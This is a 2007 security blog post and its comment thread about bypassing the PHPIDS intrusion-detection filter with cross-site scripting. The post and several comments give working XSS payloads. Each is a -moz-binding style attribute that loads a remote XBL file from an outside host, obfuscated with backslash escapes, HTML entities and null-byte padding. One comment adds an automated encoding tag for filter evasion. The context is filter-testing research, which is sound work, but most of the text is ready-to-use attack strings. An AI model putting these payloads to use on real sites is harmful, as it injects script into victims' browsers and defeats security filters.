Awesome XSS
Saturday, 24 November 2007
Hacking the PHPIDS again I found some cool XSS:-
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
I’ve moved it onto two lines for correct display.
Who’d have thought that Firefox would allow all that within the url and CSS properties π
No. 1 — November 24th, 2007 at 7:40 pm
awezome gareth!! π
anyway, I thought .mario disabled the \char thing a while ago.. or maybe it was just the \a and \l π
Greetz!
No. 2 — November 25th, 2007 at 1:07 am
hehe thanks, you next? π
No. 3 — November 25th, 2007 at 1:17 am
Check these out too π
<div/style=\-\mo\z\-&
#98\i\nd\in\g:&
#92url(//busi&
#110ess\i\nfo.&
#99o.uk\/labs
\/xbl\/xbl\
.xml\#xss)&>
<div style=-moz-bind&
#x69ng:url(//bu&
#x73inessinfo.&
#x63o.uk/labs/&
#x78bl/xbl.xml
#xss)>
No. 4 — November 25th, 2007 at 1:37 am
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<Q%^&*(ΓΒ£@!'” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
No. 5 — November 25th, 2007 at 11:10 am
A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If its getting easier to test for XSS vulnerabilities, then its getting easier to exploit those vulnerabilities.
No. 6 — November 25th, 2007 at 10:01 pm
Gareth you bandit π Hacking the PHPIDS while i visit my grams place *g*
Well done and of course fixed by now!
Thanks and Greetings,
.mario
No. 7 — November 26th, 2007 at 1:12 am
Hehe a hacker always attacks at the most inconvenient time π
No. 8 — November 26th, 2007 at 1:32 am
Believe it or not this is also a working mozbinding lol :-
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
No. 9 — November 26th, 2007 at 1:48 am
<x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>
No. 10 — November 26th, 2007 at 8:36 am
Eew… that’s indeed incredible! We need that ones for the xssDB!
No. 11 — November 26th, 2007 at 12:42 pm
I’ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-
<div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>
Much easier than having to remember which characters can be escaped π